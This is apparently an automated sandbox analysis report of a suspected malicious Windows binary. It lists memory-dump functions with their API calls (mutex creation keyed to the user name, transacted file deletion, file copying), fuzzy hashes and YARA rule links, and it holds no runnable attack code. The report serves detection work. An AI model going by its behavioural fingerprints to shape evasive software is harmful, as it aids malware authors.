                                                          • Instruction Fuzzy Hash: E751087250031ABFDB215FA18C81EBB36A9EF44755F25012BFC0497202FB38ED088798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00456C2B, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                          • _free.LIBCMT ref: 00456C8D
                                                          • _free.LIBCMT ref: 00456CC3
                                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 995e17cc212f717b7082c2e751675284280ee321403680e4a242757d3ab3bc9f
                                                          • Instruction ID: ed13bc888567cde00bbfc351a0f8c8ae521a896bc4ade63cba477859243a1126
                                                          • Opcode Fuzzy Hash: 995e17cc212f717b7082c2e751675284280ee321403680e4a242757d3ab3bc9f
                                                          • Instruction Fuzzy Hash: 4E11E6322045042AD7126766ACC592B225BD79037B7A1063FFD6453293EE2D8C0E862D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408F32, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,0000000F,00000000,00408E93), ref: 00408F45
                                                          • DeleteFileTransactedA.KERNEL32(?,00000000), ref: 00408F5C
                                                          • CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F67
                                                          • RollbackTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F6F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
                                                          • String ID:
                                                          • API String ID: 3802493581-0
                                                          • Opcode ID: a43adf62caf5974db1eb85ee24ef4982c1c2742e6d15bc16c032d1fa9072a514
                                                          • Instruction ID: 0b9a1c6a295777998402f5395d8e2dc21f9cb12e52ef794e56a236387ef29ce3
                                                          • Opcode Fuzzy Hash: a43adf62caf5974db1eb85ee24ef4982c1c2742e6d15bc16c032d1fa9072a514
                                                          • Instruction Fuzzy Hash: 8FF05E72101112FFE7202779AD48D7B366DDB46B71710073AFDA2E22D0EAB49D42867A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040EE4C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040EE51
                                                            • Part of subcall function 0040F661: __EH_prolog.LIBCMT ref: 0040F666
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: MA$mA
                                                          • API String ID: 3519838083-3130508977
                                                          • Opcode ID: 726bfba3667579c6832527f2a9027116092e2aeacf8bda20d71b26d8a3b6b44d
                                                          • Instruction ID: e49c0edb2ff657c15b66f2573327d3ecce47836aa5d53977d1b9298413ea05ac
                                                          • Opcode Fuzzy Hash: 726bfba3667579c6832527f2a9027116092e2aeacf8bda20d71b26d8a3b6b44d
                                                          • Instruction Fuzzy Hash: 0A0119B86102089FC725CF18C548EAABBF4FB08318B10C56EE49997701D7B5ED04CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00460015, Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0046001E
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0046008C
                                                            • Part of subcall function 0045A58E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045C5C4,?,00000000,00000000), ref: 0045A630
                                                            • Part of subcall function 00458BEE: RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          • _free.LIBCMT ref: 0046007D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                          • String ID:
                                                          • API String ID: 2560199156-0
                                                          • Opcode ID: f63bafe0e2bdfa9a523bc82f00bc7fcc930c5ac42d4a171c9df3443521add2e7
                                                          • Instruction ID: bc07094fe990a33b0ea8ba27b14649f323203a463d93b2a9ff97b5a0350283aa
                                                          • Opcode Fuzzy Hash: f63bafe0e2bdfa9a523bc82f00bc7fcc930c5ac42d4a171c9df3443521add2e7
                                                          • Instruction Fuzzy Hash: 4D01A7B26022157B273116B72C89DBB696DDEC6B99314013EFD05D6202FE6DCD0281BB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043C8FE, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleMappingView
                                                          • String ID:
                                                          • API String ID: 1187395538-0
                                                          • Opcode ID: 953d94ed9cdfa9234fea98fe8d504baa4e7df8494bab438b5c926ca67dd4c040
                                                          • Instruction ID: 868adbd1de175c30d0a7ba02818747a1d62e348b0c1d5c72f5557990dcc2b8b9
                                                          • Opcode Fuzzy Hash: 953d94ed9cdfa9234fea98fe8d504baa4e7df8494bab438b5c926ca67dd4c040
                                                          • Instruction Fuzzy Hash: 3B1188B0541B009EDB328B168C84F23B7E8EF9E771F21962FE5D6A1651E7789840CF19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040E00F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040E014
                                                            • Part of subcall function 0040EE4C: __EH_prolog.LIBCMT ref: 0040EE51
                                                            • Part of subcall function 0040F61A: __EH_prolog.LIBCMT ref: 0040F61F
                                                            • Part of subcall function 0040F61A: std::locale::_Init.LIBCPMT ref: 0040F63D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Initstd::locale::_
                                                          • String ID: UA
                                                          • API String ID: 1266419734-558053890
                                                          • Opcode ID: 93a190eb4f1b8022e6f3bac5d390be75366997aea4cf85b517a09718c38c0b0d
                                                          • Instruction ID: 28d6daafde8df069f5046e9cadd4ac6282cd39c2b9c41182235bee44057d564c
                                                          • Opcode Fuzzy Hash: 93a190eb4f1b8022e6f3bac5d390be75366997aea4cf85b517a09718c38c0b0d
                                                          • Instruction Fuzzy Hash: FC116DB1A112059FDB15CF59C484BAAFBF4FF44318F20852EE109A7740C7B8AE04CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040F661, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040F666
                                                            • Part of subcall function 0040F6B7: __EH_prolog.LIBCMT ref: 0040F6BC
                                                            • Part of subcall function 0040F6B7: std::locale::_Init.LIBCPMT ref: 0040F704
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Initstd::locale::_
                                                          • String ID: ]A
                                                          • API String ID: 1266419734-793799610
                                                          • Opcode ID: 2729de4497a9a1542a850cd9b97c83988ebab78927a73ccdf8030124ceb7f653
                                                          • Instruction ID: 08bcce9b36b0ca20093774ef3b879c6764c14d8263095157eb8771f340928a36
                                                          • Opcode Fuzzy Hash: 2729de4497a9a1542a850cd9b97c83988ebab78927a73ccdf8030124ceb7f653
                                                          • Instruction Fuzzy Hash: B4F0FFB5A142169FCB29CF0CC485E6ABBF4EB08308B00C56EA48A97711D7B5E900CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408D6C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408D71
                                                            • Part of subcall function 0040FA2B: __EH_prolog.LIBCMT ref: 0040FA30
                                                          Strings
                                                          • recursive_directory_iterator::recursive_directory_iterator, xrefs: 00408DAB
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: recursive_directory_iterator::recursive_directory_iterator
                                                          • API String ID: 3519838083-3545205060
                                                          • Opcode ID: 43e35b16a800cca002ba2244a55b887c5c9e220ee57376a225141c6f7b376e39
                                                          • Instruction ID: d29d3d6f359d96fed4488ef06e2fdc1a363677966424be92751b44a396d8c341
                                                          • Opcode Fuzzy Hash: 43e35b16a800cca002ba2244a55b887c5c9e220ee57376a225141c6f7b376e39
                                                          • Instruction Fuzzy Hash: 5AE06571B10115AFC754DFA8C90068AB7E5EB98758B10C53FA549E3740EB78CD008B58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00458703, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNELBASE(00000000,00000FA0,00488070,00000FA0,00000000,?,00485538,00000008,0040F7EF,?,?,00407474), ref: 00458743
                                                          Strings
                                                          • InitializeCriticalSectionEx, xrefs: 00458713
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CountCriticalInitializeSectionSpin
                                                          • String ID: InitializeCriticalSectionEx
                                                          • API String ID: 2593887523-3084827643
                                                          • Opcode ID: c816f0f1c774d17dfd9e46a6a838ee203c6269bc4abdabac4229e75d55a7b540
                                                          • Instruction ID: 87bc2577109d5b93bc3180132ed737d300587bfbfa64590724efec5a621c428d
                                                          • Opcode Fuzzy Hash: c816f0f1c774d17dfd9e46a6a838ee203c6269bc4abdabac4229e75d55a7b540
                                                          • Instruction Fuzzy Hash: CAE09231540228BBCB122F91DD49EEE3F15EB547A1F108026FD0C25271DEB58961A7C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004584AE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Alloc
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2773662609-671089009
                                                          • Opcode ID: 8c55fc141dfaf3e057ed96b26312b1511391dc9a6d328deaf657aa7e86776730
                                                          • Instruction ID: aae93c853c927a6fce767c467d9c05e024b52e7500bcbc23cd6ecbba762ab893
                                                          • Opcode Fuzzy Hash: 8c55fc141dfaf3e057ed96b26312b1511391dc9a6d328deaf657aa7e86776730
                                                          • Instruction Fuzzy Hash: 83E0C231A8062563D6212BA5AD4AFAA7F08CB55B62F208027FD0D62342FDE9584145EF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00415F8C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_fs_set_current_path@4.LIBCPMT ref: 00415F9A
                                                            • Part of subcall function 004085B0: __EH_prolog2.LIBCMT ref: 004085B7
                                                          Strings
                                                          • current_path(const path&), xrefs: 00415FA8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog2___std_fs_set_current_path@4
                                                          • String ID: current_path(const path&)
                                                          • API String ID: 2482923176-1163517728
                                                          • Opcode ID: 6fe7798f135899597210ed3381d6cdb36b95e9d04807fca46dd96355fd87b2d6
                                                          • Instruction ID: 3bacbc501107f4ade378544f260f3e2cebf37fa28bcf1fbfde7a312f77d75c49
                                                          • Opcode Fuzzy Hash: 6fe7798f135899597210ed3381d6cdb36b95e9d04807fca46dd96355fd87b2d6
                                                          • Instruction Fuzzy Hash: 24D0A9302059208BCB24A66E6A086C312DA4FC930A300482FB844C3688DB28CC8242A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045FD7C, Relevance: 3.2, APIs: 2, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0045F911: GetOEMCP.KERNEL32(00000000,0045FB83,00000000,00000000,004509FC,004509FC,00000000,00000000,00000000), ref: 0045F93C
                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,0045FBCA,00000000,00000000,00000000,?,00000000,?,?,?,004509FC), ref: 0045FDDA
                                                          • GetCPInfo.KERNEL32(00000000,0045FBCA,?,?,0045FBCA,00000000,00000000,00000000,?,00000000,?,?,?,004509FC,00000000,00000000), ref: 0045FE1C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID:
                                                          • API String ID: 546120528-0
                                                          • Opcode ID: 451ce503c37695e8153054aa05cc96ba4bfa229d424828cd0fcb7dbeab0f526a
                                                          • Instruction ID: 9105eca33c1b0cf99e32f07d768bd536811981fa0c85c265b3275e73f08a9fef
                                                          • Opcode Fuzzy Hash: 451ce503c37695e8153054aa05cc96ba4bfa229d424828cd0fcb7dbeab0f526a
                                                          • Instruction Fuzzy Hash: 7F5133719002459EDB209F36C8426BBBBE5EF41305F14447FD8868B663E73C994ECB9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00454273, Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 877d591935e33aaf26d12b12ee37bc8f28bf5214eb05359d5d3e5accf1bd8f82
                                                          • Instruction ID: ec8f8edb8a0cdccf8bab5ce056114b5495bf7bdf209698240932c254722a3b96
                                                          • Opcode Fuzzy Hash: 877d591935e33aaf26d12b12ee37bc8f28bf5214eb05359d5d3e5accf1bd8f82
                                                          • Instruction Fuzzy Hash: 7941D236B002109FCB10DF68C880A5EB3A6EF89718B1645AEE915EF352DB34ED45CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408C35, Relevance: 3.1, APIs: 2, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00408B9E: ___std_fs_get_stats@16.LIBCPMT ref: 00408BE8
                                                          • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408CBC
                                                            • Part of subcall function 0043DCB1: FindNextFileW.KERNELBASE(?,?,?,00408867,?,?,?,?,?,004088F4,?,?,?,?,00000001), ref: 0043DCBA
                                                          • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408D1D
                                                            • Part of subcall function 0040883B: ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408862
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext___std_fs_get_stats@16
                                                          • String ID:
                                                          • API String ID: 224343835-0
                                                          • Opcode ID: 9f5ed637f450a9dd64b45f7b508f2100e4b3da2c571604f523a1bc13dd25e280
                                                          • Instruction ID: 8a36594644d074abef9fd26bbdfb2da95ac7b13f5a799b95604d03d156f08715
                                                          • Opcode Fuzzy Hash: 9f5ed637f450a9dd64b45f7b508f2100e4b3da2c571604f523a1bc13dd25e280
                                                          • Instruction Fuzzy Hash: 3C41DE32904A148FDB25EB24CA84B6BB7F5BF40320F0005BEE096AB2D1DB78ED05CB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045FB68, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0045F911: GetOEMCP.KERNEL32(00000000,0045FB83,00000000,00000000,004509FC,004509FC,00000000,00000000,00000000), ref: 0045F93C
                                                          • _free.LIBCMT ref: 0045FBE0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 082724fb604edd897fb0617d59351675d8f76950a1336323d9389c502b785b1a
                                                          • Instruction ID: 9be81f47467cad05d69b4476c954f514b503b94389ac5b7c17a39bd1a510db9d
                                                          • Opcode Fuzzy Hash: 082724fb604edd897fb0617d59351675d8f76950a1336323d9389c502b785b1a
                                                          • Instruction Fuzzy Hash: 5831AE71904209AFCB01DF59D840B9E7BA5AF44319F11407AFD109B292EB3AED58CB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408873, Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408878
                                                          • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 004088E1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog___std_fs_directory_iterator_open@12
                                                          • String ID:
                                                          • API String ID: 2120191866-0
                                                          • Opcode ID: 4502f1c4d07df37fc5f4a4b2037c4c149fec898b609d89bcb1897249660c8b09
                                                          • Instruction ID: 22b3f628c41796f7dfac4e64536773724a4ee93c18adebf77bf855f5b469558d
                                                          • Opcode Fuzzy Hash: 4502f1c4d07df37fc5f4a4b2037c4c149fec898b609d89bcb1897249660c8b09
                                                          • Instruction Fuzzy Hash: 7B11B972A10204ABDB24EA99DE41BEE73B4AF44714F10443FF881B62C1DF789D44CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040F6B7, Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040F6BC
                                                            • Part of subcall function 00407AE5: std::system_error::system_error.LIBCPMT ref: 00407B53
                                                          • std::locale::_Init.LIBCPMT ref: 0040F704
                                                            • Part of subcall function 0043E56E: std::_Lockit::_Lockit.LIBCPMT ref: 0043E580
                                                            • Part of subcall function 0043E56E: std::locale::_Setgloballocale.LIBCPMT ref: 0043E59B
                                                            • Part of subcall function 0043E56E: _Yarn.LIBCPMT ref: 0043E5B1
                                                            • Part of subcall function 0043E56E: std::_Lockit::~_Lockit.LIBCPMT ref: 0043E5F1
                                                            • Part of subcall function 0040F779: __EH_prolog.LIBCMT ref: 0040F77E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prologLockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarnstd::system_error::system_error
                                                          • String ID:
                                                          • API String ID: 2895863627-0
                                                          • Opcode ID: 6d0e4e910c63bf9657072df6834f30809fd81511f2e0ff0a39d86f7a6adc1473
                                                          • Instruction ID: a0107a4360fb4e54715ab7dd2d96f0d6dfb7d36c0af84820d4bd0e51aaf10ac5
                                                          • Opcode Fuzzy Hash: 6d0e4e910c63bf9657072df6834f30809fd81511f2e0ff0a39d86f7a6adc1473
                                                          • Instruction Fuzzy Hash: B9113DB0A00B05BBD314DF6AD5C5649FBA4FF58318B50923FE00997A81DB74B5608B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045D88B, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 0045D8AC
                                                            • Part of subcall function 00458BEE: RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,00460132,?,00000004,00000000,?,?,?,004542FC,?,00000000), ref: 0045D8E8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap$_free
                                                          • String ID:
                                                          • API String ID: 1482568997-0
                                                          • Opcode ID: 746806e00521ffc0932189834999432b170000f4aa583f349c2cc2f1c352dd79
                                                          • Instruction ID: 4042ee909dd83c67ed6269063fe1c64b68e688208c942853d31d5b2d03a44c0a
                                                          • Opcode Fuzzy Hash: 746806e00521ffc0932189834999432b170000f4aa583f349c2cc2f1c352dd79
                                                          • Instruction Fuzzy Hash: 46F0C832900500A6EB313A26AC01A6B275C8F81773F10403BFC35AA2A3EE3CDD0D81AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00434F05, Relevance: 3.0, APIs: 2, Instructions: 42synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00434BE4: GetUserNameA.ADVAPI32(?,?), ref: 00434BFF
                                                          • OpenMutexA.KERNEL32 ref: 00434F56
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00434F63
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Mutex$CreateNameOpenUser
                                                          • String ID:
                                                          • API String ID: 1251385603-0
                                                          • Opcode ID: 2357d67a1aa36b86020e3899c698450bdcd90d05b33840a1f05f73d55046a76a
                                                          • Instruction ID: fdeef4015d0e9788352958dd65f34554adfd6315495ad442e79f3f84d34c21c6
                                                          • Opcode Fuzzy Hash: 2357d67a1aa36b86020e3899c698450bdcd90d05b33840a1f05f73d55046a76a
                                                          • Instruction Fuzzy Hash: 8BF04C20509258BBAB00ABF448405EFBF68FE59354F1470AAE081D3302D6349A09C3AE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043F0FE, Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEncodePointer.NTDLL(?,?,0043E713,0043E759,?,0043E5A0,00000000,00000000,00000000,00000004,0040F642,00000001,00000008,?,?,0040ED40), ref: 0043F111
                                                          • IsProcessorFeaturePresent.KERNEL32 ref: 00452545
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: EncodeFeaturePointerPresentProcessor
                                                          • String ID:
                                                          • API String ID: 4030241255-0
                                                          • Opcode ID: 42d10b606be32c5afeced3960652031ddcca21733d35498f785ad04809372ff3
                                                          • Instruction ID: 1a0b3229ebcf9f43e6d6815f30ae7d7f86194837abdae235fe8624e2a7ebb812
                                                          • Opcode Fuzzy Hash: 42d10b606be32c5afeced3960652031ddcca21733d35498f785ad04809372ff3
                                                          • Instruction Fuzzy Hash: B0F09630244309AAF6157B55AC6A71A3794A706B0AF45003FFA08541E2FFB44549D61D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00453D57, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: ef7c7e05112b36d2d7e04efc69aa01d55a493c0d503ef46b8d82c23a6e35c0e4
                                                          • Instruction ID: c8b285776cee4cb49d4793112b7ca26932680c0bd4d94ca27f750564d075c8a0
                                                          • Opcode Fuzzy Hash: ef7c7e05112b36d2d7e04efc69aa01d55a493c0d503ef46b8d82c23a6e35c0e4
                                                          • Instruction Fuzzy Hash: 76E0A02364551252A2216A6A7C8136E06B68B813BBF11023FFC20865D3EF3C4A4E46AE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043D9A6, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CopyFileW.KERNEL32(?,?,1672BEA2), ref: 0043D9B6
                                                          • GetLastError.KERNEL32(?,0043DC40,?,00000000,00000000,1672BEA2,?), ref: 0043D9CC
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CopyErrorFileLast
                                                          • String ID:
                                                          • API String ID: 374144340-0
                                                          • Opcode ID: cc9f5adac0767a14f10a68dcdfe963910dbdb46d1a31ae835a26ddc3529a89f3
                                                          • Instruction ID: 0d9fdecabbfb16bb070933ec0d049b200ef01ad75e5576dd78f32bceaf3acf5d
                                                          • Opcode Fuzzy Hash: cc9f5adac0767a14f10a68dcdfe963910dbdb46d1a31ae835a26ddc3529a89f3
                                                          • Instruction Fuzzy Hash: EBE08670A08189FFDB01CBE5EC48F7E7FE99F15304F148099F88595251DAB4D541D725
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00442EE3, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00442F01
                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00442F0C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                          • String ID:
                                                          • API String ID: 1660781231-0
                                                          • Opcode ID: d328c3c60146d95454e2084f9f6fbcfd32c6ecd66387f9d3b17ae85baf3955d5
                                                          • Instruction ID: 398de8e7ce2c91c2c1a45504a5f22ea81de7474314d404e17e0e2d35fb22efb1
                                                          • Opcode Fuzzy Hash: d328c3c60146d95454e2084f9f6fbcfd32c6ecd66387f9d3b17ae85baf3955d5
                                                          • Instruction Fuzzy Hash: EBD0A77550460114BC2062B93E4676D225425627BF3F1075FF020965C2EAAC4886332D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00270DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00270223,?,?), ref: 00270E02
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00270223,?,?), ref: 00270E07
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: 198369df8e3b31c42890e396735aaaaefcc9a841e3552643de5c1510717d2d21
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: DDD0123224522CB7DB002F94DC09BCEBB1C9F05BA6F008021FB0DE9181CBB09E5047EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045F9E7, Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 0045FA19
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID:
                                                          • API String ID: 1807457897-0
